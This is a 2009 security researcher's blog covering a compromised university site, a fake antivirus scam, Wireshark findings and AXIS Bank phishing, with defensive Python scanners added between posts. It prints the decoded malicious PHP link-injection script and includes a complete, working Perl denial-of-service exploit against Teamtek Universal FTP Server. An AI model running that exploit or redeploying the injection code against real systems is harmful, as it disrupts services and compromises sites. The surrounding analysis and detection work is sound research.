Friday, October 9, 2009

Premier University of Andhra Pradesh Serving Malware.

A couple of days back I reported the infection to a few security researchers through OWASP. Now Firefox and Google say the same!! If we visit http://www.nagarjunauniversity.ac.in/, the Firefox browser alerts you with the following warning

Another way to make sure whether the site is serving malicious pages or malware: type "nagarjunauniversity" into the Google search box and open the first link

Google's description of the pages hosted by www.nagarjunauniversity.ac.in is

Real-time view of the malicious pages and analysis
Visiting the site welcomes you with script execution; see the diagram below.
Viewing the source of this page will make you think for a while. Why are Chinese and Russian links present in the page?? Have a glimpse of the code.


When I reported the incident on OWASP, base64-encoded code was present on this page. Don't worry, the code is still present, but on other pages. As I am writing this blog, base64-encoded content is present on the following pages and many more
http://www.nagarjunauniversity.ac.in/administration.asp
http://www.nagarjunauniversity.ac.in/downloads.asp
The source code of either page looks like
If you observe carefully you can see a site which is partially encoded (percent encoding):
http%3A%2F%2Fbale.ws%2Fshow.php
Google's description mentioned the bale.ws domain.
When we open the above site it redirects to
http://superpupermegacasino.com/ which hosts *SmartDownload.exe*

VirusTotal's verdict on the EXE is *Win32/CasOnline!Adware*. Further details about the binary can be found at
http://www.virustotal.com/analisis/9709a6f32be02642671f96ee264bae85fc924072ceb1a6f07c94ab94ae77943d-1254763534

Well, decoding the base64 content with the base64_decode() call present in the malicious page gives the script below, which is passed as an argument to eval(); eval then executes the script.

error_reporting(0);                      // silence any warnings so the injection stays unnoticed

$links = new GetLinks();

echo $links->Links;                      // prints the remotely supplied links into the page
class GetLinks
{
    var $host = "esli.tw";               // remote server that hands out the link spam
    var $path = "/link.php?site=";
    var $site = "";
    var $user_agent = "";

    var $Links = "";

    var $_socket_timeout = 12;
    var $_cashe_life_time = 3600;        // re-fetch at most once an hour
    var $_cashe_file = "cashe.txt";      // local copy of the last response from esli.tw

    function GetLinks()
    {
        // Fetch again when the cache file is missing, older than an hour, or empty.
        if (!is_file($this->_cashe_file) || (filemtime($this->_cashe_file) < (time()-$this->_cashe_life_time)) || filesize($this->_cashe_file) == 0) {
            // The host name of the infected site is reported back in the request.
            $this->site = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : $HTTP_SERVER_VARS['HTTP_HOST'];
            $this->user_agent = $_SERVER['HTTP_USER_AGENT'];   // collected but never sent

            $this->Links = $this->fetch_remote_file();
            if ($handle = fopen($this->_cashe_file, 'w')) {
                fwrite($handle, $this->Links);
                fclose($handle);             // the decoded original closed the handle even when fopen() had failed
            }
        }
        else {
            $this->Links = file_get_contents($this->_cashe_file);
        }
    }

    function fetch_remote_file()
    {
        // Raw HTTP GET to esli.tw: /link.php?site=<infected host>
        $buff = '';
        $fp = fsockopen($this->host, 80, $errno, $errstr, $this->_socket_timeout);
        if (!$fp) {
            // connection failed: nothing is returned and the cache file is written empty
        } else {
            $out = "GET {$this->path}{$this->site} HTTP/1.1\r\n";
            $out .= "Host: {$this->host}\r\n";
            $out .= "Connection: Close\r\n\r\n";

            fwrite($fp, $out);
            while (!feof($fp)) {
                $buff .= fgets($fp, 128);
            }
            fclose($fp);
            $page = explode("\r\n\r\n", $buff);   // split the headers from the body
            return $page[1];                       // the body holds the links to inject
        }
    }
}
I am not sure what cashe.txt does and what its contents are!
The HTML tag responsible for the execution of scripts, malware etc. is IFRAME.
The next blog will most probably be a SmartDownload.exe binary analysis. Safe Surfing!!!
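To triage pages like the ones above, a defender wants to pull the base64 blob out of eval(base64_decode(...)), decode it, and list any percent-encoded URLs and hidden IFRAMEs next to it. The Python scanner below is an added example written for this post, not code from the infected site or from the blog; the page it scans is constructed, and the example.invalid iframe source is a placeholder.

```python
import base64
import binascii
import re
import urllib.parse

# Injected code of the form eval(base64_decode('...')), as the post found on the .asp pages.
EVAL_B64 = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)\s*\)", re.I)
# Percent-encoded absolute URLs such as http%3A%2F%2Fbale.ws%2Fshow.php.
PCT_URL = re.compile(r"https?%3A%2F%2F[A-Za-z0-9%._-]+", re.I)
IFRAME = re.compile(r"<iframe[^>]*>", re.I)
HIDDEN = re.compile(r"width=[\"']?0\b|height=[\"']?0\b|display\s*:\s*none|visibility\s*:\s*hidden", re.I)

def scan_page(html):
    """Return decoded payload hosts, decoded URLs and iframe details found in one page."""
    findings = {"decoded_php": [], "encoded_urls": [], "iframes": []}
    for m in EVAL_B64.finditer(html):
        try:
            decoded = base64.b64decode(m.group(1), validate=True).decode("latin-1")
        except (binascii.Error, ValueError):
            continue  # not valid base64: leave it for manual review
        # The decoded GetLinks script names its remote server in a "$host = ..." assignment.
        hosts = re.findall(r"\$host\s*=\s*[\"']([^\"']+)", decoded)
        findings["decoded_php"].append({"hosts": hosts, "length": len(decoded)})
    for m in PCT_URL.finditer(html):
        findings["encoded_urls"].append(urllib.parse.unquote(m.group(0)))
    for m in IFRAME.finditer(html):
        tag = m.group(0)
        src = re.search(r"src=[\"']([^\"']+)", tag, re.I)
        findings["iframes"].append(
            {"src": src.group(1) if src else None, "hidden": bool(HIDDEN.search(tag))})
    return findings

# Constructed sample page (not taken from the infected site): a base64-wrapped stub of the
# GetLinks script, the percent-encoded redirector URL quoted in the post and a zero-size iframe.
STUB = b'error_reporting(0); class GetLinks { var $host = "esli.tw"; }'
SAMPLE_PAGE = (
    "<html><body>\n"
    "<?php eval(base64_decode('" + base64.b64encode(STUB).decode() + "')); ?>\n"
    '<a href="http%3A%2F%2Fbale.ws%2Fshow.php">x</a>\n'
    '<iframe src="http://example.invalid/show.php" width=0 height=0></iframe>\n'
    "</body></html>"
)

if __name__ == "__main__":
    for kind, items in scan_page(SAMPLE_PAGE).items():
        print(kind, items)
```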

Friday, September 4, 2009

Personal Antivirus: antimalwarescanner8.com/ best-antivirus8.com/ hqvirusscanner.com/ advancedpcscanner3.com

I typed my search keywords into Google and clicked on a few links on the first page of results. One site interested me because it was redirecting me to some other site; the malicious web page doing the redirect was embedded with an unnoticeable Flash file named intro.swf. The web page on the redirected site welcomes us with a pop-up window saying "Warning!!!Your system.......". The pop-up warning window is similar across all the malicious domains.
If we click OK or the cross (X)/close button it takes us to a fake scanning page that depicts a real anti-virus scan of the PC.
After the scan it gives the results shown in the figure below, depicting a real anti-virus scan and stating that various directories on the PC are infected with trojans.
It asks the user to download "Personal Antivirus" to protect their PC.
Clicking anywhere on this page gives a pop-up window to download the anti-virus binary.
If we click on the page multiple times it pops up multiple windows for downloading the
Antivirus-[a-f0-9]{3,7}_2031.exe file. If we do "View Source" on the above page it shows a few interesting JavaScript files.
The contents of listfile.js were interesting because it had an array of various file names with EXE, HLP, DLL etc. extensions.
I downloaded different binary file samples but all the files had the same MD5 value. Surprising !!!
I tried to execute the sample on VMware with MS Windows XP SP2 installed. It gives the following memory access error on the VM. Is it detecting the VM environment?!!
I executed the same sample on MS Windows Server 2003 Standard Edition with SP2 but was not able to run the sample successfully.
Don't try to access domains with the URI
http://maliciousdomain.com/1/?sess=p2T4yjjxMi01JmlwPTY3Ljk3LjgwLjUmdGltZT0xMjU1MUAMPQZM

The sess parameter changes with every malicious domain. I was a little suspicious that the sess parameter's value was base64 encoded; decoding it to ASCII gives
§døÊ8ñ2-5&ip=67.97.80.5&time=12551@ = L
Wow!! It contains an IP address.

Malicious Domains:
hqvirusscanner.com
antimalwarescanner8.com
advancedpcscanner3.com
best-antivirus8.com
antivirus-fast-scan04.com
(new domains might come up soon)
File Name: Antivirus_[a-z0-9]{3,7}.exe
Antivirus-[a-f0-9]{3,7}_2031.exe
File Size: 163840 bytes
MD5: 22fb04afad00ccaeda1f5e5892493d77
Malware Type: Browser Hijackers
Threat Level: High

  • The file is packed with an unknown packer.
  • PEiD doesn't give any packer name.
  • OllyDbg throws an exception while loading the file.
  • Imports a few APIs from KERNEL32.DLL
VirusTotal results can be found at
http://www.virustotal.com/analisis/6a761c86645ca3b8b808a80f330ffb315dc5c175089abf7f8ff9ea2ddbbc57b2-1252076765

If I manage to run the malicious file successfully I will post a new blog. Be cautious while surfing the net and when you come across pop-ups!!
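Decoding the sess parameter and matching the two download names listed above can be scripted over proxy logs. This Python triage helper is an added example, not part of the original post; the URLs it checks are constructed (the sess value is the one quoted above, the dropper file name is made up to fit the post's pattern) and the example.invalid host is a placeholder.

```python
import base64
import binascii
import re
import urllib.parse

# Download names the post observed, as regexes (copied from the post's own notation).
FILENAME_PATTERNS = [re.compile(r"^Antivirus_[a-z0-9]{3,7}\.exe$"),
                     re.compile(r"^Antivirus-[a-f0-9]{3,7}_2031\.exe$")]
IP_RE = re.compile(rb"ip=(\d{1,3}(?:\.\d{1,3}){3})")
TIME_RE = re.compile(rb"time=(\d+)")

def decode_sess(value):
    """Base64-decode a sess= value (adding any missing padding, accepting the URL-safe
    alphabet) and return the ip= and time= fields embedded in it, or None if absent."""
    padded = value + "=" * (-len(value) % 4)
    decoder = base64.urlsafe_b64decode if re.search(r"[-_]", value) else base64.b64decode
    try:
        raw = decoder(padded)
    except (binascii.Error, ValueError):
        return None
    ip, ts = IP_RE.search(raw), TIME_RE.search(raw)
    if not ip and not ts:
        return None  # decodes, but carries nothing that looks like the tracking fields
    return {"ip": ip.group(1).decode() if ip else None,
            "time": ts.group(1).decode() if ts else None}

def triage_url(url):
    """Classify one requested URL: decode its sess parameter and match the dropper file names."""
    parts = urllib.parse.urlsplit(url)
    m = re.search(r"(?:^|&)sess=([^&]*)", parts.query)
    # unquote() rather than parse_qs(): a '+' inside base64 must not turn into a space.
    sess = decode_sess(urllib.parse.unquote(m.group(1))) if m else None
    filename = parts.path.rsplit("/", 1)[-1]
    dropper = any(p.match(filename) for p in FILENAME_PATTERNS)
    return {"host": parts.hostname, "sess": sess, "fake_av_download": dropper}

# Constructed proxy-log URLs: the sess URL quoted in the post, a dropper name built to match
# the post's pattern, and a benign request whose sess value decodes to plain text.
SAMPLE_URLS = [
    "http://maliciousdomain.com/1/?sess=p2T4yjjxMi01JmlwPTY3Ljk3LjgwLjUmdGltZT0xMjU1MUAMPQZM",
    "http://hqvirusscanner.com/download/Antivirus-3f9a_2031.exe",
    "http://example.invalid/index.html?sess=aGVsbG8gd29ybGQ",
]

if __name__ == "__main__":
    for url in SAMPLE_URLS:
        print(triage_url(url))
```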

Sunday, August 9, 2009

Hello MicroSoft...Is SCRIPT Execution Really Safe?!!

I was editing the browser settings in IE7 to allow script/applet execution. After saving the configuration I accessed a site which has an applet. As expected, the browser gave an error message saying "Your security settings do not allow websites to use ActiveX controls installed on your computer. This page may not display correctly. Click here for options..."


But......observe the pop-up window............!!
Scripts are usually safe.......Micro$$$$oft feels that SCRIPT execution is safe!!!


The version details of my browser, IE7, are
Version: 7.0.5730.13
Product ID: 92319-600-1753032-45410
Update Versions: 0

For "Happy Browsing" use Firefox.

Tuesday, April 7, 2009

Shortcut "Open Command Prompt" here

A very useful shortcut: "Open Command Prompt here"

1. Open any folder/directory (already existing on the machine) by double-clicking it, or press the "Windows+E" keys simultaneously.
2. Go to Tools->Folder Options. When you click Folder Options, a new window pops up.
3. Select File Types.
4. Go to the "(NONE) Folder" entry found under "Registered file types:".
5. Select "(NONE) Folder".
6. Now press "Advanced".
7. Press "New" and fill in:
Action:
Open Command Prompt here

Application used to perform action:
path_to_cmd.exe (e.g. C:\WINDOWS\system32\cmd.exe)

8. Press OK->OK->Close.
After completing the steps above, if you right-click any directory you can see "Open Command Prompt here" in the menu, marked with the red rectangle in the diagram.


Now you can right-click any folder/directory on any Windows OS (I tested on Windows Server 2003 with SP2 and Windows XP with SP2) and open a Command Prompt at that directory path.

Saturday, March 28, 2009

ZEBRA Protocol and BitTorrent !

I was just checking my mails. Got bored, started Wireshark!!!

To my surprise I saw packets with the Zebra protocol over TCP port 27756.


I didn't understand which application was using this protocol. I googled it, and the results said that Zebra is a routing protocol; I was not convinced by the result.

I further analyzed the packet capture and used netstat, Task Manager etc., from which I came to know that BitTorrent was using the Zebra protocol. One more thing to add: BitTorrent also uses the "BitTorrent" protocol for communication over TCP.


Further analysis of the PCAP and googling gave information that Zebra is a streaming protocol for P2P communication.

To know about Google Talk Jabber protocol communication with Wireshark captures, follow the link below
http://darshanams.blogspot.in/2008/11/deciphering-google-talk-jabber.html

For BitTorrent detection signatures
http://darshanams.blogspot.in/2012/07/bittorrent-useragents-and-detection.html

Wednesday, February 11, 2009

AXIS Bank Phishing2...Be Careful !

Don't be surprised if you get a mail from AXIS Bank (in fact not from AXIS Bank but from a malicious user) saying "MPORTANT NOTICE: Update Your Axis Bank Ltd® Net Banking Details" (this is the subject). Notice the missing "I" in the word IMPORTANT in the subject. Most people might end up reading "MPORTANT" as "IMPORTANT".
The mail looks like
Clicking "Update Your NetBanking Account" redirects us to
http://axisaccountsummary.t35.com/axisbank.co.in/RetailSignOn.htm
which looks like

Write anything in the "Login ID" and "Password" text boxes and click "Submit" without selecting the radio buttons; this redirects us to
http://axisaccountsummary.t35.com/axisbank.co.in/authenticate.php
The authenticate.php page looks like

On this page we find the "Download" and "Click Here" hyperlinks; clicking them redirects to
https://www.axisbank.co.in/BankAway/(b5zbwu55bnaszw55d2iyuz55)/web/L001/retail/jsp/user/%5Cdownload%5Ciconnectform.pdf
https://www.axisbank.co.in/BankAway/(b5zbwu55bnaszw55d2iyuz55)/web/L001/retail/jsp/user/%5Cdownload%5Cicoftfform.pdf
respectively. The above URLs, which point to the real website, use an HTTPS request to get the resource and we can see the phishing filter (lock symbol) at the bottom left, but we get a "The page cannot be found" error while downloading the PDFs.
Enter any arbitrary data into "ATM Card No.", "ATM Pin No." and "Transaction Password" and click "Continue", which redirects to
http://christkingdomorphanage.org/idbi2/accountsummary.php

I browsed to the Contact Us page (http://www.christkingdomorphanage.org/contactus.php) where the address is given as
CHRIST KINGDOM ORPHANAGE HOME
UMUEZEALAKPA ALAENYI
OGWA, MBAITOLI LGA,
IMO STATE, NIGERIA
p: (+234) 8033738658
e: info@christkingdomorphanage.org
w: http://www.christkingdomorphanage.org/

Well, this might be a phishing mail originating from Nigeria, most probably.

Safe Surfing...Enjoy!!!

Tuesday, February 3, 2009

Teamtek Universal FTP Server 1.0.50 DoS (daemon crash/ hang)

This is a working exploit for an old vulnerability which was updated recently.
############################################################
#
# Teamtek Universal FTP Server 1.0.50 allows remote attackers to cause a denial of service (daemon crash or hang) via (1)
# multiple STOR (aka PUT) commands, or an MKD command followed by (2) a '*' argument, (3) a '|' argument,
# (4) spaces, or (5) a long string. NOTE: the provenance of this information is unknown; the details are obtained solely
# from third party information.
#
# References:
# http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-7235
# http://www.securityfocus.com/bid/21085
#
# Tested on Windows XP SP1 with
# Universal FTP Server 1.0.44
# Banner: UNIVERSAL FTP SERVER - by Daniele Pratelli - www.teamtek.net - www.5e5.net
# With "mkdir |" command application crashes with "Run-time error '52:' Bad file name or number"
# With "mkdir *" command application crashes with "Run-time error '76:' Path not found"
#
# To run this exploit on MS Windows replace "#!/usr/bin/perl -w" with "#!Installation_path_for_perl -w"
# (say #!C:/Perl/bin/perl -w)
# This was strictly written for educational purposes. Use it at your own risk.
# The author will not bear any responsibility for any damages whatsoever.
# Author: Praveen Darhanam
# Email: praveen[underscore]recker[at]sify.com
# Date: 20th December, 2008
##########################################################
#!/usr/bin/perl -w
use strict;
use warnings;
use Net::FTP;

my $target = $ARGV[0] or die "Usage: perl script_name vuln_target_ip\n";
my $ftp_dos_mkd = Net::FTP->new($target, Debug => 0)
    || die "Cannot connect to host $target\nUsage: perl script_name vuln_target_ip\n";
$ftp_dos_mkd->login("anonymous", "anonymous") || die "Could not login...retry";
print "Enter 1 to launch FTP DoS using multiple STOR/PUT commands\n";
print "Enter 2 to launch FTP DoS using directory name * with MKD command\n";
print "Enter 3 to launch FTP DoS using directory name | with MKD command\n";
print "Enter 4 to launch FTP DoS using MKD command followed by spaces\n";
print "Enter 5 to launch FTP DoS using MKD command followed by a long string\n";

my $special_char = <STDIN>;   # menu choice read from the keyboard
chomp($special_char);
if ($special_char == 1) {
    # (1) flood the server with STOR (PUT) commands
    while (1) {
        $ftp_dos_mkd->stor("abc.txt");
    }
}
elsif ($special_char == 2) {
    # (2) MKD with a '*' argument
    $ftp_dos_mkd->mkdir("*");
}
elsif ($special_char == 3) {
    # (3) MKD with a '|' argument
    $ftp_dos_mkd->mkdir("|");
}
elsif ($special_char == 4) {
    # (4) MKD followed by 100000 spaces
    my $buf1 = "\x20" x 100000;
    $ftp_dos_mkd->mkdir($buf1);
}
elsif ($special_char == 5) {
    # (5) MKD followed by a 100000-character string
    my $buf2 = "D" x 100000;
    $ftp_dos_mkd->mkdir($buf2);
}
else {
    print "Please enter a correct number to launch the exploit !!\n";
}

$ftp_dos_mkd->quit;
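On the defensive side, the five vectors in the menu above are easy to spot on the FTP control channel. The Python detector below is an added example, not part of the post or of the exploit; it runs over constructed command records, and the MKD_LONG and STOR_FLOOD thresholds are assumptions.

```python
import re
from collections import Counter

# Thresholds are assumptions for this example, not values from the advisory.
MKD_LONG = 255     # longer than any sane directory name
STOR_FLOOD = 50    # this many STORs in one control session counts as a flood

def classify_mkd(arg):
    """Map an MKD argument onto the crash vectors reported for Universal FTP Server 1.0.50:
    a '*' argument, a '|' argument, only spaces, or a very long string."""
    if arg == "*":
        return "mkd-wildcard"
    if arg == "|":
        return "mkd-pipe"
    if arg and arg.strip() == "":
        return "mkd-whitespace"
    if len(arg) > MKD_LONG:
        return "mkd-long"
    return None

def detect(records):
    """records: (session_id, raw client command line) pairs; returns (session_id, alert) pairs."""
    alerts, stor_count = [], Counter()
    for sid, line in records:
        m = re.match(r"^([A-Za-z]{3,4})(.*)$", line.rstrip("\r\n"))
        if not m:
            continue
        verb, arg = m.group(1).upper(), m.group(2)
        arg = arg[1:] if arg.startswith(" ") else arg  # drop only the separator space
        if verb == "MKD":
            kind = classify_mkd(arg)
            if kind:
                alerts.append((sid, kind))
        elif verb == "STOR":
            stor_count[sid] += 1
            if stor_count[sid] == STOR_FLOOD:      # fires once per session
                alerts.append((sid, "stor-flood"))
    return alerts

# Constructed control-channel records: one session per vector in the exploit menu, one legitimate MKD, one STOR flood.
SAMPLE_RECORDS = [
    ("s1", "USER anonymous\r\n"), ("s1", "PASS anonymous\r\n"), ("s1", "MKD *\r\n"),
    ("s2", "MKD |\r\n"), ("s5", "MKD reports\r\n"),
    ("s3", "MKD " + " " * 40 + "\r\n"),
    ("s4", "MKD " + "D" * 1000 + "\r\n"),
] + [("s6", "STOR abc.txt\r\n")] * 60

if __name__ == "__main__":
    for sid, alert in detect(SAMPLE_RECORDS):
        print(sid, alert)
```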

Thursday, January 22, 2009

AXIS Bank Phishing1...Be Careful !

I have been seeing these mails for a long time. I never used to open such mails; I would just delete them. This time I thought of writing about the issue. Got a mail from "AXIS Bank" (fake) with the subject "AXIS Bank Security Service Notification (IMPORTANT)". When opened, the mail looks like

We can find the following URL in the mail
When we hover the mouse over the URL we can see the http://eyering.com/interaction/cache/update/axis.php
link at the bottom of the page.
The page below is the original AXIS BANK login page
When we click the link in the mail it redirects us to the URL http://iamthecompetition.com/subscription/axisbank.co.in/RetailSignOn.htm
and the page looks like
This is the phishing page used by attackers to collect user names and passwords.
If you click "Submit" below the radio buttons it'll redirect to another page which asks for the ATM PIN !!
Safe Surfing...Enjoy!!!
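Both AXIS Bank phishing posts share one tell: the real brand domain axisbank.co.in appears in the path of a URL whose actual host belongs to someone else (t35.com, iamthecompetition.com). The Python check below, an added example rather than anything from the posts, automates that comparison; BRAND_DOMAINS, the short CC_SECOND_LEVEL table and the login-example.invalid host are assumptions.

```python
import urllib.parse

# Brand domains a defender wants to protect (assumption: your own allow-list; both posts
# concern axisbank.co.in).
BRAND_DOMAINS = {"axisbank.co.in"}
# Second-level labels under two-letter country TLDs (co.in, ac.in, ...). Assumption: a
# production tool would use the Public Suffix List instead of this short table.
CC_SECOND_LEVEL = {"co", "com", "org", "net", "ac", "gov", "edu"}

def registrable_domain(host):
    """Crude eTLD+1: 'www.axisbank.co.in' -> 'axisbank.co.in', 'a.t35.com' -> 't35.com'."""
    labels = host.lower().rstrip(".").split(".")
    if len(labels) >= 3 and len(labels[-1]) == 2 and labels[-2] in CC_SECOND_LEVEL:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])

def check_brand_abuse(url):
    """Flag a URL that shows a protected brand domain anywhere other than as the host's
    registrable domain: in the path (both phishing posts) or as a subdomain of another domain."""
    parts = urllib.parse.urlsplit(url)
    host = parts.hostname or ""
    owner = registrable_domain(host)
    path_and_query = urllib.parse.unquote(parts.path + "?" + parts.query).lower()
    reasons = []
    for brand in sorted(BRAND_DOMAINS):
        if owner == brand:
            continue  # really the brand's own site
        if brand in host:
            reasons.append(f"'{brand}' appears in the hostname, but the site is {owner}")
        if brand in path_and_query:
            reasons.append(f"'{brand}' appears in the path, but the site is {owner}")
    return {"registrable": owner, "suspicious": bool(reasons), "reasons": reasons}

# URLs quoted in the two posts plus one constructed subdomain case (login-example.invalid).
SAMPLE_URLS = [
    "http://axisaccountsummary.t35.com/axisbank.co.in/RetailSignOn.htm",
    "http://iamthecompetition.com/subscription/axisbank.co.in/RetailSignOn.htm",
    "https://www.axisbank.co.in/BankAway/(b5zbwu55bnaszw55d2iyuz55)/web/L001/retail/jsp/user/%5Cdownload%5Ciconnectform.pdf",
    "http://axisbank.co.in.login-example.invalid/RetailSignOn.htm",
    "http://christkingdomorphanage.org/idbi2/accountsummary.php",
]

if __name__ == "__main__":
    for url in SAMPLE_URLS:
        print(check_brand_abuse(url))
```

The orphanage-hosted final page from the February post carries no brand string at all, so this check alone does not catch it; that is why hovering over links and reading the real destination, as both posts do, still matters.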